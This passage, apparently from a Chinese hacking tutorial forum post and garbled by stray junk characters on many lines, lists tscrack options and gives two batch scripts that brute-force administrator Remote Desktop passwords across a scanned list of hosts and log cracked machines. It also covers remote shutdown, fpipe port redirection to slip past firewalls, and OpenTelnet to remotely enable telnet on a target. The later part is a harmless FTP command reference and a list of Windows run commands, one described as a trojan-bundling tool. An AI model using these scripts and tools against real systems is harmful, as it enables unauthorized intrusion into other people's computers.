-b 密码错误时发出的声音
-t 同是发出多个连接（多线程）
-N Prevent System Log entries on targeted server
7 w" u3 S3 |! N1 f4 ]: W  z-U 卸载移除tscrack组件
-f 使用－f后面的密码
-F 间隔时间（频率）
-l 使用－l后面的用户名
1 Z% X! J9 H* G8 X% w% Z( ]( v-w 使用－w后面的密码字典
) x) a- P4 `3 B" V) ^$ ~6 q-p 使用－p后面的密码
& d8 O5 ?8 H* F  {+ x% J8 T-D 登录主页面
9 g, s  x% q5 t) P, u( ~3 _用法示例
3 J) m/ y4 n' ^' j0 Gtscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破主机的administrator的登陆密码
tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆192.168.0.1的administrator用户
@if not exist ipcscan.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
- L8 u9 \) H9 d. ?9 rnscan
% t8 G+ Z, D2 z# D$ R@echo 3389.txt no find or scan faild
  g. h# m; c% v0 G1 h! w(①存为3389.bat) （假设现有用SuperScan或其它扫锚器扫到一批开有3389的主机IP列表文件3389.txt)
1 w# o, J/ N6 g  h* I/ D3389.bat意思是：从3389.txt文件中取一个IP，接着运行hack.bat
3 y+ }. ^: Z1 R5 I: q. |@if not exist tscrack.exe goto noscan
4 E: N3 K0 |1 Y' ^# \# H@tscrack %1 -l administrator -w pass.dic >>rouji.txt
:noscan
@echo tscrack.exe no find or scan faild
(②存为hack.bat) (运行3389.bat就OK，且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下；就可以等待结果了)
  s2 j3 g; Y6 ~6 hhack.bat意思是：运行tscrack.exe用字典暴破3389.txt中所有主机的administrator密码，并将破解结果保存在rouji.txt文件中。

542573107

5、其它：

/ x: H2 W/ q8 h( v  r& tShutdown.exe
# w8 k) E4 S0 X! eShutdown \\IP地址 t:20 20秒后将对方NT自动关闭（Windows 2003系统自带工具，在Windows2000下用进就得下载此工具才能用。在前面Windows 2003 DOS命令中有详细介绍。）
0 g- c/ C5 ^& A: g) Ifpipe.exe (TCP端口重定向工具) 在第二篇中有详细说明（端口重定向绕过防火墙）
1 Q9 Y( h! t4 i5 q7 t5 pfpipe -l 80 -s 1029 -r 80 www.sina.com.cn 当有人扫锚你的80端口时，他扫到的结果会完全是www.sina.com.cn的主机信息
Fpipe -l 23 -s 88 -r 23 目标IP 把本机向目标IP发送的23端口Telnet请求经端口重定向后，就通过88端口发送到目标IP的23端口。（与目标IP建立Telnet时本机就用的88端口与其相连接）然后：直接Telnet 127.0.0.1（本机IP）就连接到目标IP的23端口了。
OpenTelnet.exe (远程开启telnet工具)
opentelnet.exe \\IP 帐号　密码　ntlm认证方式　Telnet端口 （不需要上传ntlm.exe破坏微软的身份验证方式）直接远程开启对方的telnet服务后，就可用telnet \\ip 连接上对方。
  i- i+ u2 H- v2 A$ T" hNTLM认证方式：０：不使用NTLM身份验证；１：先尝试NTLM身份验证，如果失败，再使用用户名和密码；２：只使用NTLM身份验证。

. \8 a  i, c) J- B! q2 U7 eResumeTelnet.exe (OpenTelnet附带的另一个工具)
: `; F5 u' `- y6 Z: qresumetelnet.exe \\IP　帐号　密码 用Telnet连接完对方后，就用这个命令将对方的Telnet设置还原，并同时关闭Telnet服务。

#10 十：

/ z: h, |- [% y8 n5 }+ u. C8 P6、FTP命令详解：

& P& L# g0 d3 VFTP命令是Internet用户使用最频繁的命令之一，熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。
9 \. L% i  a4 p' d
FTP的命令行格式为：
ftp -v -d -i -n -g [主机名] ，其中
. ~/ K& b0 l( u- c* [
-v 显示远程服务器的所有响应信息；

-n 限制ftp的自动登录，即不使用；.n etrc文件；
+ a% C  v  O, q! \, O5 V/ V
-d 使用调试方式；

' E# s% ]" Y" h  C# R1 w9 O-g 取消全局文件名。

+ k, Z( D& {  Y! b# \FTP使用的内部命令如下(中括号表示可选项):

1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip
2.$ macro-ame[args]： 执行宏定义macro-name。

6 c" B9 s- O7 C+ \; R& r& f! v3.account[password]： 提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。
3 C" a2 s' Q+ M5 L
5.ascii：使用ascii类型传输方式。
( T; m3 n0 K( A6 L# e1 y6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。
' Y4 B8 ^, d4 K. n/ a8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。
10.cd remote-dir：进入远程主机目录。
( m; w' @) I- m+ F% c8 L
11.cdup：进入远程主机目录的父目录。
/ h2 Z, y1 N( c' @, n5 A( h+ E12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。

' E  Z. N4 {2 ]& S, ~" w13.close：中断与远程服务器的ftp会话(与open对应)。
' i/ v" K( U% W7 Y( o) p14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

; a$ D" r, {; W# t3 l15.delete remote-file：删除远程主机文件。
16.debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

  B1 I& \3 E* |/ m& Z17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。
, [$ v% F. v: `% _( ^18.disconnection：同close。

3 W9 V+ \7 K7 B- }+ [: i, S" P19.form format：将文件传输方式设置为format，缺省为file方式。
2 \; U8 Y6 i7 ?20.get remote-file[local-file]： 将远程主机的文件remote-file传至本地硬盘的local-file。
* r" l' b( A( _. e  t1 w6 V
21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。
- t5 ^" `$ b- F7 }22.hash：每传输1024字节，显示一个hash符号(#)。
- X% |% ]# U* R$ b' S$ ^
3 _; `8 W; D1 ^' l23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。
: |7 {! \& F/ d/ b/ ]24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。

7 C2 c6 q& b8 Q, Y2 w25.image：设置二进制传输方式(同binary)。
26.lcd[dir]：将本地工作目录切换至dir。

27.ls[remote-dir][local-file]：显示远程目录remote-dir， 并存入本地文件local-file。
28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。

29.mdelete[remote-file]：删除远程主机文件。
! }" E) Z# s5 w+ D4 @30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir *.o.*.zipoutfile 。
! C; r* Z1 r2 P. r! l
3 l: @9 E; Z& H# R0 }31.mget remote-files：传输多个远程文件。
, }4 H( _' a' q( L5 ^32.mkdir dir-name：在远程主机中建一目录。

5 B4 C# P9 W+ K. I; a33.mls remote-file local-file：同nlist，但可指定多个文件名。
34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。

35.modtime file-name：显示远程主机文件的最后修改时间。
36.mput local-file：将多个文件传输至远程主机。
1 z) ^5 g, [6 Z) [2 u  ]" D
" I$ U% @* y& s, k# |37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。
38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。
40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。
: j' }% F5 H' \# E& c% o( G
41.open host[port]：建立指定ftp服务器连接，可指定连接端口。
2 t4 }* J- y* H2 {5 T42.passive：进入被动传输方式。
5 S$ ]) M* L* {5 {
43.prompt：设置多个文件传输时的交互提示。
6 d! v& w2 I/ W( D7 }' o0 k+ v44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。
45.put local-file[remote-file]：将本地文件local-file传送至远程主机。
46.pwd：显示远程主机的当前工作目录。
9 m* f- a4 }& e+ f1 ?
, e3 [4 R# {, `: L# V47.quit：同bye，退出ftp会话。
5 ?" `& O$ n' w9 ?48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.
1 r8 S# l3 u' f' G% {- f0 z, H
49.recv remote-file[local-file]：同get。
50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。

51.rhelp[cmd-name]：请求获得远程主机的帮助。
52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。
0 z  I, a8 F, U1 F6 b
53.rename[from][to]：更改远程主机文件名。
0 k- G$ W1 U  W) C* a54.reset：清除回答队列。

5 R/ e; p6 V: q% M" f) B+ K55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。
, F" s, t. Y  e+ u" R1 K: P) Z56.rmdir dir-name：删除远程主机目录。

57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。
58.send local-file[remote-file]：同put。
) c4 K( a3 i" y9 [
: N) I. ?) J, z  h9 `59.sendport：设置PORT命令的使用。
60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。
) Q8 \* v4 C( Y
61.size file-name：显示远程主机文件大小，如：site idle 7200。
62.status：显示当前ftp状态。
6 Z2 u, F! x/ n# X+ }) k$ T* k1 r
- M& I8 A- b- F* Q* M" p. m8 M63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。
64.sunique：将远程主机文件名存储设置为只一(与runique对应)。
2 @6 B! ^# }* _. `) [+ }# s* h
8 n3 S0 Y9 T1 i) V8 B! v8 J; ~65.system：显示远程主机的操作系统类型。
& }; ^8 w% M" S) U7 a3 M66.tenex：将文件传输类型设置为TENEX机的所需的类型。
' X# [0 _* E) k* g
67.tick：设置传输时的字节计数器。
& G# @* Q! c; r' C. I! v1 |68.trace：设置包跟踪。
% E) @7 Q6 ^, k7 j1 _- a
/ W% j* L1 N$ d/ }! k3 T69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。
70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3

1 I. R( R0 g  f2 ]71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。
+ V1 f( t6 O: M9 L" n; s: K72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.

. D* X4 F0 b; b73.?[cmd]：同help.

- h/ C  R3 L8 p$ _0 a  V#11 十一：

/ t* {3 k; N. e: A3 ~7 _$ y7：计算机运行命令全集 winver---------检查Windows版本
+ L8 z2 Q6 a! \  ]9 vwmimgmt.msc----打开windows管理体系结构
1 t. a7 S- I! c! u  L& mwupdmgr--------windows更新程序
winver---------检查Windows版本
& R) I( h. W0 F; |* ^3 U2 Cwmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
! w& D+ b0 |# a1 I+ bwrite----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
) Y3 q5 T% {- R# X) ]) ewinchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
. T( k- K" [0 e9 g. y4 cmplayer2-------简易widnows media player
5 l; }9 p; h6 V8 mmspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
' b* `' T1 R- J- adrwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
8 I) [2 [. i" t: {diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
9 B* d) b4 X% t/ x( R* Yddeshare-------打开DDE共享设置
) e) Z5 H/ L4 j. s, f3 E+ r' i" E" Qdvdplay--------DVD播放器
+ j& z+ i, R8 D+ f  }net stop messenger-----停止信使服务
net start messenger----开始信使服务
8 X3 f# Z! Y8 L" C5 Dnotepad--------打开记事本
' [( ?" L1 C5 ~3 F4 {nslookup-------网络管理的工具向导
6 T+ c, n+ ^+ J0 ontbackup-------系统备份和还原
narrator-------屏幕"讲述人"
' s! A+ d  e; u; bntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
5 m3 X5 k" o& N) m7 B# V/ z5 ?netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
: a0 `4 l$ Z* X9 e4 I2 ~sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
% {9 @2 ]. R' D2 U* p$ N2 Ysecpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
1 v/ c6 y8 U0 S* X% w( r9 bservices.msc---本地服务设置
/ v) y  L/ j2 P3 h6 Y7 p5 iSndvol32-------音量控制程序
sfc.exe--------系统文件检查器
, t  e3 Q/ W1 y" ~sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
# v0 S7 L, [, a' Etourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器
eventvwr-------事件查看器
3 D! P; C: l; `, W7 K3 feudcedit-------造字程序
" @( S8 o4 j# ~8 z9 x) G4 G: B. pexplorer-------打开资源管理器
" {5 M' p3 [9 Q. ^  E' opackager-------对象包装程序
perfmon.msc----计算机性能监测程序
' _( g) x( r% }/ K, Fprogman--------程序管理器
+ x# V% M4 G$ K6 g+ Nregedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
, t# d+ e8 `! b3 \7 P) orononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
6 d' z5 @: _. X1 Y* D) b  qchkdsk.exe-----Chkdsk磁盘检查
; O! L0 [1 {9 y4 c& x  t  u9 S" o9 _certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
4 Y. x* O' Q! `cliconfg-------SQL SERVER 客户端网络实用程序
( T- {+ s8 U% q' m$ g2 JClipbrd--------剪贴板查看器
* Q+ F/ W$ C5 B* mconf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
5 |, c6 b& j5 dciadv.msc------索引服务程序
9 @3 @. A, v" j( i4 i7 Y/ O. mosk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
, T( h( G. L5 P  ulogoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
! Q9 D" m7 j. T' Mfsmgmt.msc-----共享文件夹管理器
. z: \# T: o* Z; n) v; Y# hutilman--------辅助工具管理器
/ w* z; w9 U% X: n& g6 @+ u4 Xgpedit.msc-----组策略